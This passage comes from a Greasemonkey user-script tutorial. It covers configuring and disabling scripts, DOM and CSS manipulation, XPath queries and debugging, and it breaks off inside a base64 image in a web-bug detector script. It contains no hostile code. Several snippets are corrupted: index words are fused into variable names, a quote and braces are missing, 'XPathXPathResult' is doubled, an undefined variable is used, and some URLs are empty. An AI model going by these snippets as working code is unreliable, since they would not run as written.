all the user scripts you have installed. (If you've been following along from the beginning of the book, this will include just one script: Butler.) - Select Butler in the list if it is not already selected, and deselect the Enabled checkbox. The color of Butler in the left pane should change subtly from black to gray. (This is difficult to see while it is still selected, but itenable the Butler user script by repeating the procedure and reselecting the Enabled checkbox in the Manage User Scripts dialog. Tip Once disabled, a user script will remain disabled until you manually reenable it, even if you quit and relaunch Firefox. Disabling All User Scripts While Greasemonkey is installed, it displays a little smiling monkey icon in the status bar, as shown in Figure 1-5. Clicking the Greasemonkey icon in the status bar disables Greasemonkey entirely; any user scripts you have installed will no longer execute. The Greasemonkey icon will frown and turn gray to indicate that Greasemonkey is currently disabled, as shown in Figure 1-6. Clicking the icon again reenables Greasemonkey and any enabled user scripts. Disabling a User Script by Removing All Included Pages As shown in "Master the @include and @exclude Directives" [Hack #3], user scripts contain two sections: a list of pages to run the script and a list of pages not to run the script. Another way to prevent a user script from executing is to remove all the pages on which it runs: - From the menu bar, select Tools → Manage User Scripts…. Greasemonkey will pop up the Manage User Scripts dialog. - In the left pane of the dialog is a list of all the user scripts you have installed. - Select Butler in the list if it is not already selected, and then select http://*.google.com/* in the list of Included Pages. Click the Remove button to remove this URL from the list. - Click OK to exit the Manage User Scripts dialog. Disabling a User Script by Excluding All Pages Yet another way to disable a user script is to add a wildcard to exclude it from all pages: - From the menu, select Tools → Manage User Scripts…. Greasemonkey will pop up the Manage User Scripts dialog. - In the left pane of the dialog is a list of all the user scripts you have installed. - Select Butler in the list if it is not already selected. - Under the Excluded Pages list, click the Add button. Greasemonkey will pop up an Add Page dialog box. Type * and click OK. - Click OK to exit the Manage User Scripts dialog. Now, Butler is still installed and technically still active. But because excluded pages take precedence over included pages, Butler will never actually be executed, because you have told Greasemonkey to exclude it from all pages. Disabling a User Script by Editing config.xml As shown in "Install a User Script" [Hack #1], Greasemonkey stores the list of installed scripts in a configuration file, config.xml, deep within your Firefox profile directory: <UserScriptConfig> <Script filename="butler.user.js" name="Butler" namespace="" description="Link to competitors from Google search results" enabled="true"> <Include>http://*.google.com/*</Include> </Script> </UserScriptConfig> You can manually edit this file to disable a user script. To disable Butler, find its <Script> element in config.xml, and then set the enabled attribute to false. Uninstalling a User Script Finally, you can remove a user script entirely by uninstalling it: - From the menu bar, select Tools → Manage User Scripts…. Greasemonkey will pop up a Manage User Scripts dialog. - In the left pane, select Butler. - Click Uninstall. - Click OK to exit the Manage User Scripts dialog. Butler is now uninstalled completely. Configure a User Script There's more than one way to configure Greasemonkey user scripts: before, during, and after installation. One of the most important pieces of information about a user script is where it should run. One page? Every page on one site? Multiple sites? All sites? This hack explains several different ways to configure where a user script executes. Inline As described in "Provide a Default Configuration" [Hack #2], user scripts contain a section that describes what the script is and where it should run. Editing the @include and @exclude lines in this section is the first and easiest way to configure a user script, because the configuration travels with the script code. If you copy the file to someone else's computer or publish it online, other people will pick up the default configuration. During Installation Another good time to alter a script's metadata is during installation. Remember in "Install a User Script" [Hack #1] when you first installed the Butler user script? Immediately after you select the Install User Script…menu item, Greasemonkey displays a dialog box titled Install User Script, which contains lists of the included and excluded pages, as shown in Figure 1-7. The two lists are populated with the defaults that are defined in the script's metadata section (specifically, the @include and @exclude lines), but you can change them to anything you like before you install the script. Let's say, for example, that you like Butler, but you have no use for it on Froogle, Google's cleverly named product comparison site. Before you install the script, you can modify the configuration to exclude that site but still let the script work on other Google sites. To ensure that Butler doesn't alter Froogle, click the Add…button under "Excluded pages" and type the wildcard URL for Froogle, as shown in Figure 1-8. After Installation You can also reconfigure a script's included and excluded pages after the script is installed. Assuming you previously excluded Froogle from Butler's configuration (as described in the previous section), let's now change the configuration to include Froogle again: - From the Firefox menu, select Tools/Manage User Scripts…. Greasemonkey will pop up the Manage User Scripts dialog. - In the pane on the left, select Butler. In the pane on the right, Greasemonkey should show you two lists: one of included pages (http://*.google.*/*) and one of excluded pages (*). - In the "Excluded pages" list, select* and click the Remove button. - Click OK to exit the Manage User Scripts dialog. Now, search for a product on Froogle to verify that Butler is once again being executed. Editing Configuration Files The last way to reconfigure a user script is to manually edit the config.xml file, which is located within your Firefox profile directory. (See "Install a User Script" [Hack #1] for the location.) The graphical dialogs Greasemonkey provides are just friendly ways of editing config.xml without knowing it. Each installed user script is represented by a <Script> element, as shown in the following example: <Script filename="helloworld.user.js" name="Hello World" namespace="" description="example script to alert "Hello world!" on every page" enabled="true"> <Include>*</Include> <Exclude>*</Exclude> <Exclude>*</Exclude> </Script> You can make any changes you like to the config.xml file. You can add, remove, or edit the <Include> and <Exclude> elements to change where the script runs. You can change the enabled attribute to false to disable the script. You can even uninstall the script by deleting the entire <Script> element. Tip Starting in Version 0.5, Greasemonkey no longer caches the config.xml file in memory. If you manually change the config.xml file while Firefox is running, you will see the changes immediately when you navigate to a new page or open the Manage User Scripts dialog. Add or Remove Content on a Page Use DOM methods to manipulate the content of a web page. Since most user scripts center around adding or removing content from a web page, let's quickly review the standard DOM methods for manipulating content. Adding an Element The following code adds a new element to the end of the page. The element will appear at the bottom of the page, unless you style it with CSS to position it somewhere else [Hack #7]: var web pagescontentelmNewContent = document.createElement('div'); document.body.appendChild(elmNewContent) Removing an Element You can also remove elements from a page. Removed elements disappear from the page (obviously), and any content after them collapses to fill the space the elements occupied. The following code finds the element with id="ads" and removes it: var elmDeleted = document.getElementById("ads"); elmDeleted.parentNode.removeChild(elmDeleted); Tip If all you want to do is remove ads, it's probably easier to install the AdBlock extension than to write your own user script. You can download AdBlock at. Inserting an Element Many user scripts insert content into a page, rather than appending it to the end of the page. The following code creates a link to and inserts it immediately before the element with id="foo": var elmNewContent = document.createElement('a'); elmNewContent.href = ''; elmNewContent.appendChild(document.createTextNode('click here')); var elmFoo = document.getElementById('foo'); elmFoo.parentNode.insertBefore(elmNewContent, elmFoo); You can also insert content after an existing element, by using the nextSibling property: elmFoo.parentNode.insertBefore(elmNewContent, elmFoo.nextSibling); Tip Inserting new content before elmFoo.nextSibling will work even if elmFoo is the last child of its parent (i.e., it has no next sibling). In this case, elmFoo.nextSibling will return null, and the insertBefore function will simply append the new content after all other siblings. In other words, this example code will always work, even when it seems like it shouldn't. Replacing an Element You can replace entire chunks of a page in one shot by using the replaceChild method. The following code replaces the element with id="extra" with content that we create on the fly: var elmNewContent = document.createElement('p'); elmNewContent.appendChild(document.createTextNode('Replaced!')); var elmExtra = document.getElementById('extra'); elmExtra.parentNode.replaceChild(elmNewContent, elmExtra); As you can see from the previous few examples, the process of creating new content can be arduous. Create an element, append some text, set individual attributes…bah. There is an easier way. It's not a W3C-approved DOM property, but all major browsers support the innerHTML property for getting or setting HTML content as a string. The following code accomplishes the same thing as the previous example: var elmExtra = document.getElementById('extra'); elmReplaced.innerHTML = '<p>Replaced!</p>'; The HTML you set with the innerHTML property can be as complex as you like. Firefox will parse it and insert it into the DOM tree, just as if you had created each element and inserted it with standard DOM methods. Modifying an Element's Attributes Modifying a single attribute is simple. Each element is an object in JavaScript, and each attribute is reflected by a corresponding property. The following code finds the link with id="somelink" and changes its href property to link to a different URL: var elmLink = document.getElementById('somelink'); elmLink.href = ''; You can accomplish the same thing with the setAttribute method: elmLink.setAttribute('href', '') This is occasionally useful, if you are setting an attribute whose name you don't know in advance. You can also remove an attribute entirely with the removeAttribute method: elmLink.removeAttribute('href'); Tip See "Make Pop-up Titles Prettier" [Hack #28] for an example of why this might be useful. If you remove the href attribute from a link, it will still be an <a> element, but it will cease to be a link. If the link has an id or name attribute, it will still be a page anchor, but you will no longer be able to click it to follow the link. Tip is a great reference for browser DOM support. Alter a Page's Style There are four basic ways to add or modify a page's CSS rules. In many of the user scripts I've written, I want to make things look a certain way. Either I'm modifying the page's original style in some way, or I'm adding content to the page and I want to make it look different from the rest of the page. There are several ways to accomplish this. Adding a Global Style Here is a simple function that I reuse in most cases in which I need to add arbitrary styles to a page. It takes a single parameter, a string containing any number of CSS rules: function addGlobalStyle(css) { try { var elmHead, elmStyle; elmHead = document.getElementsByTagName('head')[0]; elmStyle = document.createElement('style'); elmStyle.type = 'text/css'; elmHead.appendChild(elmStyle); elmStyle.innerHTML = css; } catch (e) { if (!document.styleSheets.length) { document.createStyleSheet(); } document.styleSheets[0].cssText += css; } } Inserting or Removing a Single Style As you see in the previous example, Firefox maintains a list of the stylesheets in use on the page, in document.styleSheets (note the capitalization!). Each item in this collection is an object, representing a single stylesheet. Each stylesheet object has a collection of rules, and methods to add new rules or remove existing rules. The insertRule method takes two parameters. The first is the CSS rule to insert, and the second is the positional index of the rule before which to insert the new rule: document.web pagesstyle alterationstyleSheets[0].insertRule('html, body { font-size: large }', 0); Tip In CSS, order matters; if there are two rules for the same CSS selector, the later rule takes precedence. The previous line will insert a rule before all other rules, in the page's first stylesheet. You can also delete individual rules by using the deleteRule method. It takes a single parameter, the positional index of the rule to remove. The following code will remove the first rule, which we just inserted with insertRule: document.styleSheets[0].deleteRule(0); Modifying an Element's Style You can also modify the style of a single element by setting properties on the element's style attribute. The following code finds the element with id="foo" and sets its background color to red: var elmModify = document.getElementById("foo"); elmModify.style.backgroundColor = 'red'; Tip The property names of individual styles are not always obvious. Generally they follow a pattern, where the CSS rule margin-top becomes the JavaScript expression someElement.style.marginTop. But there are exceptions. The float property is set with elmModify.style.cssFloat, since float is a reserved word in JavaScript. There is no easy way to set multiple properties at once. In regular JavaScript, you can set multiple styles by calling the setAttribute method to the style attribute to a string: elmModify.setAttribute("style", "background-color: red; color: white; " + "font: small serif"); However, as explained in "Avoid Common Pitfalls" [Hack #12], this does not work within Greasemonkey scripts. Master XPath Expressions Tap into a powerful new way to find exactly what you're looking for on a page. Firefox contains a little-known but powerful feature called XPath. XPath is a query language for searching the Document Object Model (DOM) that Firefox constructs from the source of a web page. As mentioned in "Add or Remove Content on a Page" [Hack #6], virtually every hack in this book revolves around the DOM. Many hacks work on a collection of elements. Without XPath, you would need to get a list of elements (for example, with document.getElementsByTagName) and then test each one to see if it's something of interest. With XPath expressions, you can find exactly the elements you want, all in one shot, and then immediately start working with them. Tip A good beginners' tutorial on XPath is available at. Basic Syntax To execute an XPath query, use the document.evaluate function. Here's the basic syntax: var snapshotResults = document.evaluate('XPath expression', document, null, XPathResult.UNORDERED_NODE_SNAPSHOT_TYPE, null); The function takes five parameters: - The XPath expression itself - More on this in a minute. - The root node on which to evaluate the expression - If you want to search the entire web page, pass in document. But you can also search just a part of the page. For example, to search within a <div id="foo">, pass document.getElementById("foo") as the second parameter. - A namespace resolver function - You can use this to create XPath queries that work on XHTML pages. See "Select Multiple Checkboxes" [Hack #36] for an example. - The type of result to return - If you want a collection of elements, use XPathResult.UNORDERED_NODE_SNAPSHOT_TYPE. If you want to find a single element, use XPathResult.FIRST_ORDERED_NODE_TYPE. More on this in a minute, too. - A previous XPath result to append to this result - I rarely use this, but it can be useful if you want to conditionally concatenate the results of multiple XPath queries. The document.evaluate function returns a snapshot, which is a static array of DOM nodes. You can iterate through the snapshot or access its items in any order. The snapshot is static, which means it will never change, no matter what you do to the page. You can even delete DOM nodes as you move through the snapshot. A snapshot is not an array, and it doesn't support the standard array properties or accessors. To get the number of items in the snapshot, use snapResults.snapshotLength. To access a particular item, you need to call snapshotResults.snapshotItem(index). Here is the skeleton of a script that executes an XPath query and loops through the results: var snapResults = document.evaluate("XPath expression", document, null, XPathResult.UNORDERED_NODE_SNAPSHOT_TYPE, null); for (var i = snapResults.snapshotLength - 1; i >= 0; i--) { var elm = snapResults.snapshotItem(i); // do stuff with elm } Examples The following XPath query finds all the elements on a page with class="foo": var snapFoo = document.evaluate(//*[@class='foo']", document, null, XPathResult.UNORDERED_NODE_SNAPSHOT_TYPE, null); The // means "search for things anywhere below the root node, including nested elements." The * matches any element, and [@class='foo'] restricts the search to elements with a class of foo. You can use XPath to search for specific elements. The following query finds all <input type="hidden"> elements. (This example is taken from "Show Hidden Form Fields" [Hack #30].) var snapHiddenFields = document.evaluate("//input[@type='hidden']", document, null, XPathResult.UNORDERED_NODE_SNAPSHOT_TYPE, null); You can also test for the presence of an attribute, regardless of its value. The following query finds all elements with an accesskey attribute. (This example is taken from "Add an Access Bar with Keyboard Shortcuts" [Hack #68].) var snapAccesskeys = document.evaluate("//*[@accesskey]", document, null, XPathResult.UNORDERED_NODE_SNAPSHOT_TYPE, null); Not impressed yet? Here's a query that finds images whose URL contains the string "MZZZZZZZ". (This example is taken from "Make Amazon Product Images Larger" [Hack #25].) var snapProductImages = document.evaluate("//img[contains(@src, 'MZZZZZZZ')", document, null, XPathXPathResult.UNORDERED_NODE_SNAPSHOT_TYPE, null); You can also do combinations of attributes. This query finds all images with a width of 36 and a height of 14. (This query is taken from "Zap Ugly XML Buttons" [Hack #86].) var snapXMLImages = document.evaluate("//img[@width='36'][@height='14']", document, null, XPathResult.UNORDERED_NODE_SNAPSHOT_TYPE, null); But wait, there's more! By using more advanced XPath syntax, you can actually find elements that are contained within other elements. This code finds all the links that are contained in a paragraph whose class is g. (This example is taken from "Refine Your Google Search" [Hack #96].) var snapResults = document.evaluate("//p[@class='g']//a", document, null, XPathResult.UNORDERED_NODE_SNAPSHOT_TYPE, null); Finally, you can find a specific element by passing XPathResult.FIRST_ORDERED_NODE_TYPE in the third parameter. This line of code finds the first link whose class is "yschttl". (This example is taken from "Prefetch Yahoo! Search Results" [Hack #52].) var elmFirstResult = document.evaluate("//a[@class='yschttl']", document, null, <b>XPathResult.FIRST_ORDERED_NODE_TYPE</b>, null).singleNodeValue; If you weren't brain-fried by now, I'd be very surprised. XPath is, quite literally, a language all its own. Like regular expressions, XPath can make your life easier, or it can make your life a living hell. Remember, you can always get what you need (eventually) with standard DOM functions such as document.getElementById or document.getElementsByTagName. XPath's a good tool to have in your tool chest, but it's not always the right tool for the job. Develop a User Script "Live" Edit a user script and see your changes immediately. While you're writing a user script, you will undoubtedly need to make changes incrementally and test the results. As shown in "Install a User Script" [Hack #1], Greasemonkey stores your installed user scripts deep within your Firefox profile directory. Changes to these installed files take effect immediately, as soon as you refresh the page. This makes the testing cycle quick, because you can edit your partially written script, save changes, and refresh your test page to see the changes immediately. Setting Up File Associations Before you can take advantage of live editing, you need to set up file associations on your system, so that double-clicking a .user.js script opens the file in your text editor instead of trying to execute it or viewing it in a web browser. On Mac OS X. Control-click a .user.js file in Finder, and then select Get Info. In the Open With section, select your text editor from the drop-down menu, or select Other…to find the editor program manually. Click Change All to permanently associate your editor with .js files. On Windows. Right-click a .user.js file in Explorer, and then select Open With → Choose Program. Select your favorite text editor from the list, or click Browse to find the editor application manually. Check the box titled "Always use the selected program to open this kind of file" and click OK. The "Live Editing" Development Cycle Switch back to Firefox and select Tools → Manage User Scripts. Select a script from the pane on the left and click Edit. If your file associations are set up correctly, this should open the user script in your text editor. The first time you do this on Windows, you will get a warning message, explaining that you need to set up your file associations, as shown in Figure 1-9. You're one step ahead of the game, since you've already done this. Tip The reason for the warning is that, by default, Windows is configured to execute .js files in the built-in Windows Scripting Host environment. This is generally useless, and certainly confusing if you don't know what's going on. Once the user script opens in your text editor, you can make any changes you like to the code. You're editing the copy of the user script within your Firefox profile directory—the copy that Greasemonkey uses. As soon as you make a change and save it, you can switch back to Firefox and refresh your test page to see the effect of your change. Switch to your editor, make another change, switch back to Firefox, and refresh. It's that simple. Tip During live editing, you can change only the code of a user script, not the configuration parameters in the metadata section. If you want to change where the script runs, use the Manage User Scripts dialog. When you're satisfied with your user script, switch back to your editor one last time and save a copy to another directory. Warning Remember, you've been editing the copy deep within your Firefox profile directory. I've lost significant chunks of code after live-editing a user script and then uninstalling it without saving a copy first. Don't make this mistake! Save a backup somewhere else for safekeeping. Debug a User Script Learn the subtle art of Greasemonkey debugging. The actual process of writing user scripts can be frustrating if you don't know how to debug them properly. Since JavaScript is an interpreted language, errors that would otherwise cause a compilation error (such as misspelled variables or function names) can only be caught when they occur at runtime. Furthermore, if something goes wrong, it's not immediately obvious how to figure out what happened, much less how to fix it. Check Error Messages If your user script doesn't appear to be running properly, the first place to check is JavaScript Console, which lists all script-related errors, including those specific to user scripts. Select Tools → JavaScript Console to open the JavaScript Console window. You will probably see a long list of all the script errors on all the pages you've visited since you opened Firefox. (You'd be surprised how many high-profile sites have scripts that crash regularly.) In the JavaScript Console window, click Clear to remove the old errors from the list. Now, refresh the page you're using to test your user script. If your user script is crashing or otherwise misbehaving, you will see the exception displayed in JavaScript Console. Tip If your user script is crashing, JavaScript Console will display an exception and a line number. Due to the way Greasemonkey injects user scripts into a page, this line number is not actually useful, and you should ignore it. It is not the line number within your user script where the exception occurred. If you don't see any errors printed in JavaScript Console, you might have a configuration problem. Go to Tools → Manage User Scripts and double-check that your script is installed and enabled and that your current test page is listed in the Included Pages list. Log Errors OK, so your script is definitely running, but it isn't working properly. What next? You can litter your script with alert calls, but that's annoying. Instead, Greasemonkey provides a logging function, GM_log, that allows you to write messages to JavaScript Console. Such messages should be taken out before release, but they are enormously helpful in debugging. Plus, watching the console pile up with log messages is much more satisfying than clicking OK over and over to dismiss multiple alerts. GM_log takes one argument, the string to be logged. After logging to JavaScript Console, the user script will continue executing normally. Save the following user script as testlog.user.js: // ==UserScript== // @name TestLog // @namespace // ==/UserScript== if (/^http:\/\/www\.oreilly\.com\//.test(location.href)) { GM_log("running on O'Reilly site"); } else { GM_log('running elsewhere'); } GM_log('this line is always printed'); If you install this user script and visit, these two lines will appear in JavaScript Console: Greasemonkey:: running on O'Reilly site Greasemonkey:: this line is always printed Greasemonkey dumps the namespace and script name, taken from the user script's metadata section, then the message that was passed as an argument to GM_log. If you visit somewhere other than, these two lines will appear in JavaScript Console: Greasemonkey:: running elsewhere Greasemonkey:: this line is always printed Messages logged in Javascript Console are not limited to 255 characters. Plus, lines in JavaScript Console wrap properly, so you can always scroll down to see the rest of your log message. Go nuts with logging! Tip In JavaScript Console, you can right-click (Mac users Control-click) on any line and select Copy to copy it to the clipboard. Find Page Elements DOM Inspector allows you to explore the parsed Document Object Model (DOM) of any page. You can get details on each HTML element, attribute, and text node. You can see all the CSS rules from each page's stylesheets. You can explore all the scriptable properties of an object. It's extremely powerful. DOM Inspector is included with the Firefox installation program, but depending on your platform, it might not installed by default. If you don't see a DOM Inspector item in the Tools menu, you will need to reinstall Firefox and choose Custom Install, then select Developer Tools. (Don't worry; this will not affect your existing bookmarks, preferences, extensions, or user scripts.) A nice addition to DOM Inspector is the Inspect Element extension. It allows you to right-click on any element—a link, a paragraph, even the page itself—and open DOM Inspector with that element selected. From there, you can inspect its properties, or see exactly where it fits within the hierarchy of other elements on the page. Tip Download the Inspect Element extension at. One last note: DOM Inspector does not follow you as you browse. If you open DOM Inspector and then navigate somewhere else in the original window, DOM Inspector will get confused. It's best to go where you want to go, inspect what you want to inspect, then close DOM Inspector before doing anything else. Test JavaScript Code Interactively JavaScript Shell is a bookmarklet that allows you to evaluate arbitrary JavaScript expressions in the context of the current page. You install it simply by dragging it to your links toolbar. Then you can visit a web page you want to work on, and click the JavaScript Shell bookmarklet in your toolbar. The JavaScript Shell window will open in the background. Tip Install Javascript Shell from. JavaScript Shell offers you the same power as DOM Inspector but in a free-form environment. Think of it as a command line for the DOM. You can enter any JavaScript expressions or commands, and you will see the output immediately. You can even make changes to the page, such as creating a new element document.createElement and adding to the page with document.body.appendChild. Your changes are reflected in the original page. One feature of JavaScript Shell that is worth special mention is the props function. Visit, open JavaScript Shell, and then type the following two lines: var link = document.getElementsByTagName('a')[0] props(link) JavaScript Shell spews out a long list of properties: Methods of prototype: blur, focus Fields of prototype: id, title, lang, dir, className, accessKey, charset, coords, href, hreflang, name, rel, rev, shape, tabIndex target, type, protocol, host, hostname, pathname, search, port, hash, text, offsetTop, offsetLeft, offsetWidth, offsetHeight, offsetParent, innerHTML, scrollTop, scrollLeft, scrollHeight, scrollWidth, clientHeight, clientWidth, style Methods of prototype of prototype of prototype: insertBefore, replaceChild, removeChild, appendChild, hasChildNodes, cloneNode, normalize, isSupported, hasAttributes, getAttribute, setAttribute, removeAttribute, getAttributeNode, setAttributeNode, removeAttributeNode, getElementsByTagName, getAttributeNS, setAttributeNS, removeAttributeNS, getAttributeNodeNS, setAttributeNodeNS, getElementsByTagNameNS, hasAttribute, hasAttributeNS, addEventListener, removeEventListener, dispatchEvent, compareDocumentPosition, isSameNode, lookupPrefix, isDefaultNamespace, lookupNamespaceURI, isEqualNode, getFeature, setUserData, getUserData Fields of prototype of prototype of prototype: tagName, nodeName, nodeValue, nodeType, parentNode, childNodes, firstChild, lastChild, previousSibling, nextSibling, attributes, ownerDocument, namespaceURI, prefix, localName, ELEMENT_NODE, ATTRIBUTE_NODE, TEXT_NODE, CDATA_SECTION_NODE, ENTITY_REFERENCE_NODE, ENTITY_NODE, PROCESSING_INSTRUCTION_NODE, COMMENT_NODE, DOCUMENT_NODE, DOCUMENT_TYPE_NODE, DOCUMENT_FRAGMENT_NODE, NOTATION_NODE, baseURI, textContent, DOCUMENT_POSITION_DISCONNECTED, DOCUMENT_POSITION_PRECEDING, DOCUMENT_POSITION_FOLLOWING, DOCUMENT_POSITION_CONTAINS, DOCUMENT_POSITION_CONTAINED_BY, DOCUMENT_POSITION_IMPLEMENTATION_SPECIFIC Methods of prototype of prototype of prototype of prototype of prototype: toString What's this all about? It's a list of all the properties and methods of that <a> element that are available to you in JavaScript, grouped by levels in the DOM object hierarchy. Methods and properties that are specific to link elements (such as the blur and focus methods, and the href and hreflang properties) are listed first, followed by methods and properties shared by all types of nodes (such as the insertBefore method). Again, this is the same information that is available in DOM Inspector—but with more typing and experimenting, and less pointing and clicking. Tip Like DOM Inspector, JavaScript Shell does not follow you as you browse. If you open JavaScript Shell and then navigate somewhere else in the original window, JavaScript Shell will get confused. It's best to go where you want to go, open JavaScript Shell, fiddle to your heart's content, and then close JavaScript Shell before doing anything else. Be sure to copy your code from the JavaScript Shell window and paste it into your user script once you're satisfied with it. Embed Graphics in a User Script Add images to web pages without hitting a remote server. A user script is a single file. Greasemonkey does not provide any mechanism for bundling other resource files, such as image files, along with the JavaScript code. While this might offend the sensibilities of some purists who would prefer to maintain separation between code, styles, markup, and media resources, in practice, it is rarely a problem for me. This is not to say you can't include graphics in your scripts, but you need to be a bit creative. Instead of posting the image to a web server and having your user script fetch it, you can embed the image data in the script itself by using a data: URL. A data: URL allows you to encode an image as printable text, so you can store it as a JavaScript string. And Firefox supports data: URLs natively, so you can insert the graphic directly into a web page by setting an img element's src attribute to the data: URL string. Firefox will display the image without sending a separate request to any remote server. Tip You can construct data: URLs from your own image files at. The Code This user script runs on all pages. It uses an XPath query to find web bugs: 1 x 1-pixel img elements that advertisers use to track your movement online. The script filters this list of potential web bugs to include only those images that point to a third-party site, since many sites use 1 x 1-pixel images for spacing in table-based layouts. There is no way for Greasemonkey to eliminate web bugs altogether; by the time a user script executes, the image has already been fetched. But we can make them more visible by changing the src attribute of the img element after the fact. The image data is embedded in the script itself. Save the following user script as webbugs.user.js: // ==UserScript== // @name Web Bug Detector // @namespace // @description make web bugs visible // @include * // ==/UserScript== var snapImages = document.evaluate("//img[@width='1'][@height='1']", document, null, XPathResult.UNORDERED_NODE_SNAPSHOT_TYPE, null); for (var i = snapImages.snapshotLength - 1; i >= 0; i--) var elmImage = snapImages.snapshotItem(i); var urlSrc = elmImage.src; var urlHost = urlSrc.replace(/^(.*?):\/\/(.*?)\/(.*)$/, "$2"); if (urlHost == window.location.host) continue; elmImage.width = '80'; elmImage.height = '80'; elmImage.title = 'Web bug detected! src="' + elmImage.src + '"'; elmImage.src = ' + 'AABHNCSVQICAgIfAhkiAAAABl0RVh0U29mdHdhcmUAd3d3Lmlua3NjYXBlLm9yZ5vuPB' + 'oAAAv3SURBVHic7Zx5kFxVGcV%2FvWVmemaSSSYxiRkSgglECJK4gAtSEjQFLmjEUhEV' + 'CxUs1NJyK5WScisKFbHUwo0q10jQABZoEJBEtgSdArNHkhCyTTKZzNo9S3dm6faPc2%2' + 'FepNP9Xvfrnu5J2afqVXq6X7%2F3vXO%2F%2By3n3g5UUUUVVVRRRRVVVFFFFVVU4Y4p' + 'lTbgTEUAmA%2F8CohU2JYzEtOBbwKDQH1lTTkVwQm%2Bfk0J7hEG5gCrgAFgYbFGlRIT' + 'TWAT0EJx064BuMBc52nzetJgognsB6YBF%2BIvAQSAZuAa4F9AG4qFkwYTTWACxa3lwP' + 'UU7olRYCbwduAp4Ih5P1wqA4vFRBOYBnqAHciLPl%2FgPRuBDwLDwEbgkHmdLq2Z%2Fh' + 'Eqwz1GgVqgA7gT6AOey%2BN7ITRdvwfcAzxh3gsC2yfCUD%2BYaA8EEdgN7AceQuVISx' + '7fiwJXI2%2F7E5AETgC7mUQeWA4CAWLI89airPo1RJAbpgHXAr9HYaAfxdS%2BCbDPNw' + '%2FlInAM6ERJ4B%2FADbiXI0FE4CvQdE8gApPASIlsCqAYeyHwfeTlBVcK5SIQREAMuB' + 'dNwVvJ3VXUAPOQlx5HU3cMDUB3kXZMAWYAVwG%2FBR43f%2B8C7qPASqGcBI4CXcBLKC' + 'm8A1iR49wpwNko41rPA4ijsqhQBFHoaAE%2BhWbBPaizuRGFiVZgPbCaAsqkctdT%2FS' + 'ie%2FRl4M%2FAdYAOnk1KPHjaOiB%2F2eb8aRNxS4L2oJKoFHjT3Pgr0mnvMQwkqiUSL' + 'j5NHsnIjcKq5QAjFiySaRinzr59MOIySQBfwU%2BBHwGXA3zPOq0MExsy9Rgu4RxANwJ' + 'tQFn8bsMhc6yHgAeAYGshONEgBc5%2F5wAHkmZ8xNrrCjcAw8DIUhy4zRtSah6vDSQwd' + 'wH9R%2FEjl8YBxROJ2c7wfTSlLUgBN4Zeb80bNvbxQj8haBaxEAgTIy34OPILiaa%2Bx' + '2w6ORZuxfz5KVH0owbjWnG4E9iCPmYG6gB3m%2FSB6yFpE8BzgQ8CXgc%2BhntWNyCQw' + 'ZB5gB3Almma2PAkjr59rHvSE2wOY714D%2FBhlbtAgPYPEh6fMtftwiMvm0SmUpMZQ%2' + 'FE2i7B%2FAZbZ5xcABFJ%2B6jKENyPsiiMBe4EXg38DFaHqsA25BnpnrxnGk1GwFPgxc' + 'DvxlnE1hROBe3ONfFHgdIi9hrrEVJapBlLF7EHmDeHtyGmhHg3YOiqFFEWgvOmSO48gD' + 'a8wRRVOnFnjSGH6TeYjbgbvRIGRiyDzQduQNq1AcTBqbapEK00vuui%2BCptudxpavoM' + 'GM4xTu4zN4Iegxdi1AuWAiiveTCKOC9CykulwF%2FBARtwf4pPk8E03A61H91QHMMu9P' + 'R3ExjfrgpizfDSLy7jbn3Y48caE5v1Q9fhQls0CuE0pRB46ikW4DDiIv%2FBtSXoZRSd' + 'ABfCPDEBsLd6FYusLYYz0LHE%2FIxEwUO28AHkZlSSfKrn3kl3TywZC5bs5lhFKrMQlz' + '0zHzuhWRsRDFuQGUZNLmnCZExuWI7EdRnL0Seee9wDZOJXEqcBHwCxSvbkGZ9jDeCccP' + 'bBlVVgGjGTgPuAR4F%2FAYDmmfwBm4eebzFIqvc1C5tNac%2Fx4U3yxqgVcjr%2B0Hrg' + 'NemXHOGY0gSiJxFPz%2FA3wJtW33IVJOoDhZi7zzrah4TaN4uQSVIGngUhxywsBinDLp' + 'W8gTvVSdMwZn43haN%2Bov%2B8zfu4BPA79GD78ZdQUJ8%2Fn4ox15Vwp1E1EUO1tQvE' + 'ujcukS5OkVRc7sUgBCaL3jDpRBN6LKvwfFt5sQEWPA%2FUBzOBx%2By4IFC0KLFy8mGo' + '0SCoUIBAKMjIywd%2B9e9uzZw%2FDwMCiAfwR4HmX2j6LB%2BCyqEduosLhaLIEtwF2o' + '5%2BxHGfdpVId1ofKlGbWCNwLT6uvrWbZsGXV1dYTD4axHIBBg9%2B7dtLa2gjxyDfAF' + 'c92bEaH78S8ylAx%2Bs3AjmpJ%2FQEH9eeDbqDXrRBnxCMq6tmcOhUKh5YsWLQJgdHT0' + '5DE2NnbK36lUiubmZmKxGPF4vBFlZIDvApvQ4lICxcXXosG5FrV0s4EXKJ3w6opCPXA%' + '2B6nc%2FhnrkBPAbFPsGUL1nJSI7tWYj6WpNfX19ePbs2ad4WyQSyemJfX19bNy40d57' + 'DfAT5JHLUYZeiVq%2BTPQjve9nqAyaMORL4BvQFHo3jmK7BRl4DCWNdnNktk7NaEVtaV' + '1dHQ0NDZ7EjSdw27ZtADtRsbwMhYMGc%2B2jwD%2BRYNCISqdFwLmoRAL16avNOTvITz' + 'HKG14Engf8DmU8iwGUTTcgsjpQMO8me0D%2FIkowhEIhIpFIXuRFIhEOHz5MZ2cn6KFt' + '15RE03g9IjaJCt0IksHsMzWgyuAcNM2XoiJ%2FCyrwn0XkF7VE4EZgANVlvxxn%2BKOo' + 'hOhFWfYo2b3Ooha1dVdkfuBGXDgcJh6P093dDSInjDTHx1GWH0Dhw6pFKTR4EaQWRc1r' + 'e6TN%2B8uRanQxas%2B6UdeTzzp1VripMQHUNg2i%2BuuvqEBOoGl7BBHpNiWa0OifBp' + 'swQJ5pyQsGgyQSCUZGTuaAl1BNuRNnda4fkdePCvMRY69deK8zttfiyPonkNc9a85bgh' + 'LgH1FB7ke1cfXAEFo5C6Asm0SFcQciMJ8bXo1iFyC1cyZ6Iiv5dnpfI21sGEbZdwOSrm' + 'Ie37Oibx3yNqtlNuLIcSnUSiaR%2BFEwvDywAZHVhZ61F7l9PoE4hBPsmY8C6hwUqBLm' + 'ggdQRZwDMTQAAyiBvAb10nfgTWDa3CaBws0URGATIrEOJbi1qNhfjjqkguBWB4aQ0HkQ' + 'PWO7MSTfyj%2BCSozrpqMs9CpE4AzzFFbos%2FMxAymk852P%2Bt91SIBdaU5fn6cdFm' + 'NoGtulURsjpqG4ugL14AXBTQ8MINcfRIE87uPaXcDYAhRw5qLWpQUJgNOR5HtW9u8%2F' + 